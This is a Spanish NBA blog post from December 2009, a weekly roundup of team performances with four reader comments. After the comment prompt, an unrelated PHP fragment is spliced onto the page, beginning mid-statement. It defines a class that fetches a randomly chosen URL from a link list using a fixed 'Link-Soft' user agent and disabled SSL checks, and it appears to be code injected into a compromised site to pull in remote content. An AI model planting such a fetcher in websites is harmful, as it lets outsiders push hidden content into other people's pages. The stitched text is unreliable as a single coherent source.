Informe Semanal #8

21 de December de 2009 por txusma

¿Porqué todos los jugones sonríen igual?

¿Cómo se siente uno cuando es el único que holla la cima? Pues así se debería sentir el único equipo capaz de cerrar la semana immaculado, Los Angeles Lakers. El equipo de Phil Jackson contínua con mano de hierro y a pesar de algún contratiempo como la lesión de Kobe Bryant, ya son el mejor equipo de la competición. Y para celebrarlo han confirmado la renovación de Pau Gasol por unos 64 kilos por 3 años. Un pastizal que se tiene bien merecido el Sant Boi.

Ganarás el pan con el sudor de tu frente

La mayoría de los cocos de la competición acaban la semana en positivo. Boston vio frenada su racha de victoria de manera sorprendente en casa y frente los Sixers. Lo consideraremos un accidente. Cleveland y Orlando, en cambio no nos dejan tan buenas sensaciones a pesar de su récord semanal. Esta misma madrugada los de Ohio han demostrado que distan mucho de ser un equipo y Lebron se ha visto más solo que de costumbre, que ya es decir. Y los de Orlando siguen con graves problemas internos que podrían costarle la cabeza a Stan van Gundy en cualquier momento.

Atlanta, Dallas (que han ganado a los Cavs sin Nowitzki), Miami, Houston, Portland, San Antonio y Phoenix son los otros cocos que también han ganado la mayoría de sus partidos. Como veis una semana de los más normal.

Los Angeles Clippers y los Chicago Bulls también cierran una buena semana. Los primeros comienzan a carburar y a la espera que Blake Griffin vuelva en las próximas semanas se suben al carro de los Playoffs. Los de la Ciudad del Viento, a pesar de que nos están decepcionando un poquito este año, están empatados con los Pistons en la octava posición.

Se dejaban llevar

El retorno de Kevin Love le ha sentado bastante bien a los Wolves que miran el futuro con un poquitín más de optimismo. En el Este, Knicks, Raptors y 76ers también terminan la semana con 2 victorias y 2 derrotas. Con las tonterías los canadienses están septimos y los Knicks a una sola victoria de los Playoffs. Y la impresión que da es que pierden un partido sí y otro también…

En el Oeste las tablas son para Nuggets (no se puede considerar una buena semana), Hornets, Jazz, Kings y Grizzlies. Los Kings se mantienen cerca de Playoffs gracias a su fabuloso rookie, Tyreke Evans. Falta por ver como se articulará el equipo con la vuelta de Francisco García y Kevin Martín, pero si se gestiona bien habrá que tenerlos en cuenta. Punto para Whestpal. Y los Grizzlies continúan sorprendiendo a todos los que no daban ni un duro por ellos. Lejos queda los peores augurios y ahora los ositos juegan hasta medio bien de la mano de Zach Randolph y Rudy Gay. Y Marc Gasol continúa a un gran nivel.

Malos tiempos para la lírica

Si Kevin Durant juega un mal partido los Thunder no tienen absolutamente ninguna posibilidad y si juega un gran partido, aún así, lo tienen que sudar. Mala semana para ellos pero se mantienen cerca de la octava posición. Eso sí, Harden empieza a carburar y seguro que será importante en el futuro.

Wizards, Bobcats y Pacers sólo han sido capaces de ganar un partido a pesar de tener en plantilla, los 2 primeros equipos, jugadores de nivel All-Stars en Gilbert Arenas y Gerald Wallace. Lamentablemente no es suficiente.

El Carabasas Club

A New Jersey Nets les comenzarán a llamar “La Farmacia” porque son un gran remedio para cualquier equipo que juegue contra ellos. 4 derrotas que les hunden aún más en la clasificación.

A 0 también han acabado la semana Bucks, Pistons y Warriors. Los primeros se desinflan por momentos y ya ven peligrar su puesto de playoffs a pesar de que los que vienen por detrás no lo hacen muy rápido que digamos. Debería preocuparles que esta racha negativa coincida con la vuelta de Michael Redd. En Detroit continúan con las lesiones y así es muy difícil jugar. Al menos Stuckey ha dado un paso al frente y han descubierto a un Jebreko que les puede ser de utilidad. Por último, los Golden State encadenan su 5 derrota consecutiva pero no parece que vaya a cambiar nada por allí. Sus partidos continuarán siendo como la ruleta rusa.

Comenta

4 comentarios a esta entrada

  1. Lagarto dice:
    #1

    Estimados amigos de tjnba:

    Hace ya varias semanas descubrí vuestro blog y me ha sorprendido gratamente. Yo, que soy seguidor de la NBA (aunque soy un poco diletante, todo hay que decirlo) aprecio vuestras crónicas, que detecto como bien escritas y muy equilibradas.

    Hasta ahora no me había atrevido a opinar debido al nivel que se lee por aquí, pero supongo que con el tiempo me animaré a hacerlo. Sirva por ahora mi felicitación.

    Lagarto.

      Citar

  2. Tobal dice:
    #2

    Los Bucks se están viniendo abajo,con lo bien que empezaron la liga,aunque es verdad que frente a Lakers y Kings perdieron por un punto,ahora necesitan por lo menos ganar unos tres partidos seguidos para coger confianza

      Citar

  3. Viva_Dirk dice:
    #3

    A los Bucks lo que les falta es consistencia por parte de los 2 tios que mas cobran: Redd y Bogut. A Jennings e Ilyasova no se les puede pedir mas y el resto también estan rindiendo.

      Citar

  4. PIRATA dice:
    #4

    Viva creo que Bogut ha leído tu comentario antes del partido de esta madrugada.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>